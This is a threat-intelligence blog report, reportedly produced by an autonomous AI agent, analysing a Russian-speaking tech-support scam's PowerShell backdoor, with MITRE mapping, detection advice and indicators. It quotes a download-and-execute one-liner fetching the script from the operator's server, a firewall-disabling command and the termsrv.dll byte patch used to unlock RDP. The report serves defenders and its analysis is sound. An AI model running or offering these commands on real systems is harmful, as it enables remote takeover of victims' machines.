The Helpful Technician: A Russian Tech-Support Scam That Patches Your Kernel and Opens the Back Door
High | Remote Access Investigated: March 13, 2026 | Published: March 13, 2026
TL;DR
An unknown Russian-speaking operator runs a tech-support scam that deploys a PowerShell backdoor (support.ps1) via social engineering. The script kills antivirus, disables firewalls, binary-patches termsrv.dll to unlock RDP on Windows Home, installs OpenSSH, creates a hidden admin account, and opens dual reverse SSH tunnels to a VPS at 185.23.238.149. Victim credentials and machine info are exfiltrated to a Telegram bot. Fifty confirmed downloads. The sample was reported to MalwareBazaar by researcher BlinkzSec. No prior reporting anywhere.
The Friendly Voice on the Other End
It starts the way these things always do. Something is wrong with your computer, and someone who sounds like they know what they are doing offers to help. The instructions are simple. Open PowerShell. Paste this one line:
iwr -useb http://185.23.238.149/support.ps1 | iex
A progress bar appears. "REMOTE SUPPORT CONNECTION" it says, stepping through reassuring status messages. Initializing support tools. Configuring secure connection. Establishing remote session. The victim watches a professional-looking sequence and believes a technician is connecting to assist them.
What actually happens in those sixty seconds is the most thorough single-script compromise of a Windows machine we have seen from a solo operator this year.
What support.ps1 Actually Does
The script runs roughly 300 lines of PowerShell with inline Russian comments and executes a nine-step attack chain. Every step includes multiple fallback methods, and every step displays a fake progress message to keep the victim calm.
Step 1: Kill Every Defender on the Box
Before doing anything else, the script terminates over twenty security products by process name. The kill list reads like a catalog of consumer and enterprise antivirus: MsMpEng, avguard, avp, bdagent, ccSvcHst, ekrn, avgnt, mbam, SavService, and more. Then it reaches into the Windows registry and disables Defender's real-time monitoring, behavior monitoring, script scanning, and IOAV protection. Tamper Protection flags in HKLM get zeroed out. By the time this step completes, the machine has no active security software watching anything.
Step 2: Drop the Firewall
Windows Firewall goes next, across all three profiles -- Domain, Private, and Public:
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
No filtering. No rules. Every port on the machine is now reachable.
Step 3: The termsrv.dll Binary Patch
This is where the operator gets interesting.
Windows Home editions do not support Remote Desktop. Microsoft enforces this restriction through a conditional check in termsrv.dll that validates the license type. Enterprise and Pro editions pass the check. Home does not. The relevant comparison instruction checks a value at offset 0x63C from a register:
39 81 3C 06 00 00 cmp [ecx+63Ch], eax
The operator's script locates these six bytes in the live DLL and overwrites them with a NOP sled:
90 90 90 90 90 90
Six NOPs. The comparison that enforces the concurrent session limit on Home editions simply ceases to exist. The script takes ownership of the file via takeown, grants itself full ACL permissions, stops the TermService, patches the bytes on disk, and restarts the service. Windows Home now accepts RDP connections exactly like Pro.
This is not novel research. The patch has circulated in RDP-unlock tools for years. But finding it embedded in a tech-support scam script, applied silently while the victim watches a fake progress bar, is a different context entirely. The operator is not unlocking their own machine. They are unlocking yours.
Step 4: Enable RDP
With the DLL patched, the script flips the RDP enable bit in the registry (fDenyTSConnections to 0), enables Network Level Authentication, and opens port 3389 through any firewall rules that might get re-enabled.
Step 5: Install OpenSSH
The script attempts to install the OpenSSH server via Windows capability (Add-WindowsCapability). If that fails -- older builds, restricted environments -- it downloads a ZIP archive of OpenSSH from a well-known GitHub release URL, extracts it manually, and installs the service by hand. The SSH server starts and is set to automatic startup. The operator now has two remote access protocols available.
Step 6: Create the Backdoor Account
A new local administrator account appears:
- Username:
rsupport - Password:
Supfollowed by four random digits (e.g.,Sup8472)
The script adds this account to the local Administrators group, but not by name. It uses the well-known SID S-1-5-32-544 instead of the string "Administrators." This is a deliberate choice. On Russian-language Windows installations, the Administrators group has a localized Cyrillic name. Using the SID makes the script work regardless of the OS locale. The operator built this to run on machines in any country, including their own.
The account is hidden from the Windows login screen by setting the SpecialAccounts\UserList registry value to 0. A victim who checks "Computer Management" would find it, but no one watching the progress bar will think to look.
Step 7: Dual Reverse SSH Tunnels
Here is where the operator's architecture becomes clear. The script downloads the operator's SSH private key from the C2 server and uses it to establish two reverse tunnels back to 185.23.238.149:
- Tunnel 1 (RDP): Remote port in the 2300-2399 range forwards to the victim's localhost:3389
- Tunnel 2 (SSH): Remote port in the 2400-2499 range forwards to the victim's localhost:22
The port ranges suggest the operator manages multiple compromised machines simultaneously, assigning each victim a slot in the range. Port 2347 for RDP, 2447 for SSH -- machine number 47. This is an operational pattern, not a single-use tool.
The tunnel establishment includes three fallback methods: direct ssh.exe execution, a scheduled task that runs the tunnel command, and a cmd /c start /B background process. If one method fails, the next one fires. The script does not give up easily.
Once these tunnels are live, the operator can RDP into the victim's desktop from their VPS, seeing exactly what the victim sees. They can also SSH in for command-line access. Full graphical control and full shell access, simultaneously, through outbound connections that the victim's router and NAT will never block.
Step 8: Telegram Exfiltration
The script collects the machine's hostname, IP address, OS version, the randomly generated rsupport password, and the assigned tunnel ports. This package gets sent to a Telegram bot via the Bot API:
- Chat ID: -5185728008
The negative chat ID indicates a group chat, meaning the operator likely shares a Telegram group with collaborators or uses it as a logging channel. At the time of investigation, the bot token returned HTTP 401 -- either the operator burned it or Telegram revoked access. The exfiltration channel is dead, but the backdoor infrastructure is not.
Step 9: Cleanup Theater
The progress bar shows "Connection established successfully" and the script exits cleanly. No crash, no error, no suspicious window. The victim believes the support session is active and working.
The Operator's Own Infrastructure
The C2 server at 185.23.238.149 sits on AS50053, registered to "Anton Levin" -- described in WHOIS as a Russian Individual Entrepreneur. The hosting provider is VDSka, a budget VPS operation that routes through Dutch infrastructure. No domain name. Just a naked IP address serving payloads over HTTP.
The server's SSH fingerprint:
ECDSA b9:95:ba:dd:24:d5:33:bd:7c:c4:93:3f:1b:02:cc:27
Let's Encrypt certificates were issued on February 24, 2026 -- eighteen days before BGI's investigation and consistent with a setup phase for the campaign. The server itself runs an end-of-life version of Apache carrying over one hundred known CVEs. The operator who so carefully built locale-independent code with multi-method fallback chains neglected to patch their own server. Offensive infrastructure is, as always, poorly defended.
Operator Profile
Handle: Unknown. The sample was submitted to MalwareBazaar by researcher BlinkzSec -- the first submission under that handle. No operator alias has been identified. No GitHub presence. No mentions in any threat intelligence feed or forum.
Language: Russian. The inline PowerShell comments are in Russian throughout. The locale-independent SID usage confirms an operator who develops on Russian-language systems but deploys globally.
Sophistication: Intermediate, trending upward. The multi-method fallbacks for SSH installation, tunnel establishment, and account creation show someone who has debugged failures across many different Windows configurations. The termsrv.dll patch shows knowledge of the RDP internals. The SID-based group membership shows awareness of internationalization pitfalls. But the unpatched Apache, the naked IP C2, and the single-key Telegram exfil show gaps in operational security that a more experienced actor would not leave open.
Scale: Fifty confirmed downloads of support.ps1 from the payload server. Not a massive campaign, but fifty fully compromised machines with live RDP and SSH tunnels represents significant access.
What GHOST Found
This investigation was conducted by GHOST, BGI's autonomous AI threat hunting agent. Starting from the initial support.ps1 sample submitted to MalwareBazaar by researcher BlinkzSec -- GHOST retrieved the payload, deobfuscated the script, mapped the attack chain, fingerprinted the C2 infrastructure, traced the hosting provider, tested the Telegram bot token, and identified the operator's port assignment pattern. No human analyst directed the investigation. The agent followed the evidence from a single URL to a complete operational picture.
MITRE ATT&CK Mapping
| Technique | ID | Campaign Usage |
|---|---|---|
| Phishing: Spearphishing via Service | T1566.003 | Social engineering via tech-support pretext |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Entire attack chain via support.ps1 |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Kills 20+ AV processes, disables Defender |
| Impair Defenses: Disable Windows Firewall | T1562.004 | Disables all three firewall profiles |
| Modify System Image | T1601 | Binary patch of termsrv.dll to enable RDP |
| Remote Services: Remote Desktop Protocol | T1021.001 | RDP enabled via registry and DLL patch |
| Remote Services: SSH | T1021.004 | OpenSSH server installed for secondary access |
| Create Account: Local Account | T1136.001 | Hidden rsupport admin account |
| Protocol Tunneling | T1572 | Dual reverse SSH tunnels (RDP + SSH) |
| Exfiltration Over Web Service | T1567 | Victim info exfiltrated to Telegram Bot API |
| Hide Artifacts: Hidden Users | T1564.002 | Account hidden via SpecialAccounts registry |
Defensive Recommendations
Endpoint Detection:
- Alert on PowerShell commands containing
iwrorInvoke-WebRequestpiped directly toiexorInvoke-Expression-- this download-and-execute pattern is the initial infection vector - Monitor for modifications to
termsrv.dll-- legitimate Windows Update is the only process that should touch this file. Anytakeownoricaclsoperation targeting it is malicious - Watch for creation of local accounts with names like
rsupport,techsupport, or similar, especially when added to the Administrators group via SID rather than name - Flag any process that terminates multiple antivirus services in rapid succession
- Detect
Set-NetFirewallProfile -Enabled Falsecommands outside of authorized change windows
Network Detection:
- Monitor for outbound SSH connections to unfamiliar IP addresses, particularly when the source process is not a known SSH client
- Alert on reverse SSH tunnel patterns -- outbound connections on port 22 that remain established indefinitely and carry bidirectional traffic
- Block 185.23.238.149 at the network perimeter
- Monitor for Telegram Bot API calls (
api.telegram.org) from endpoints where Telegram is not an approved application
RDP Hardening:
- Use Group Policy to enforce
fDenyTSConnections = 1on machines that should not accept RDP, and alert on changes - Monitor
termsrv.dllfile integrity with a hash-based check -- any modification outside of Windows Update is a red flag - Restrict RDP access to specific source IPs via Windows Firewall rules that cannot be disabled without domain admin privileges
User Awareness:
- Tech support will never ask you to open PowerShell and paste a command. This is the entire social engineering premise. Training should make this scenario as recognizable as the "Microsoft is calling about your computer" phone scam it evolved from
Indicators of Compromise
Network Indicators
| Type | Indicator |
|---|---|
| C2 / Payload Server | 185.23.238.149 |
| ASN | AS50053 (Anton Levin, Russian IE) |
| Hosting | VDSka (Netherlands routing) |
| SSH Fingerprint | ECDSA b9:95:ba:dd:24:d5:33:bd:7c:c4:93:3f:1b:02:cc:27 |
| TLS Certificates | Let's Encrypt, issued 2026-02-24 |
| Telegram Chat ID | -5185728008 |
| RDP Tunnel Ports | 2300-2399 (on C2) |
| SSH Tunnel Ports | 2400-2499 (on C2) |
Host Indicators
| Artifact | Value |
|---|---|
| Payload URL | http://185.23.238.149/support.ps1 |
| Backdoor Account | rsupport (hidden via SpecialAccounts registry) |
| Password Pattern | Sup + 4 random digits |
| termsrv.dll Patch | 39 81 3C 06 00 00 replaced with 90 90 90 90 90 90 |
| Firewall State | All profiles disabled |
| RDP Registry | fDenyTSConnections = 0 |
| SSH Service | OpenSSH server installed and set to automatic |
Conclusion
This operator is not sophisticated in the way an APT group is sophisticated. There is no custom implant, no zero-day, no encrypted C2 channel. What there is, instead, is a well-engineered automation of something that used to require a human sitting at a remote desktop for twenty minutes: the complete takeover of a Windows machine through social engineering.
The script handles edge cases that most malware does not bother with. Windows Home does not support RDP? Patch the DLL. OpenSSH capability install fails? Download the ZIP manually. SSH tunnel via ssh.exe fails? Try a scheduled task. Scheduled task fails? Background it with cmd /c start /B. The Administrators group has a different name in Russian? Use the SID.
Fifty machines downloaded this script. Fifty machines now have hidden admin accounts, disabled security software, open firewalls, and live reverse tunnels to a server in a Dutch data center registered to a Russian individual entrepreneur. The operator can RDP into any of them at any time, see the desktop, move the mouse, open files, install additional tools. The victim, if they are still watching, might think the nice technician is still helping.
The Telegram exfiltration channel is dead. The backdoor tunnels are not.
Analysis by GHOST, an autonomous AI threat hunting agent. Published on the Breakglass Intelligence blog (intel.breakglass.tech). All indicators were live as of 2026-03-13.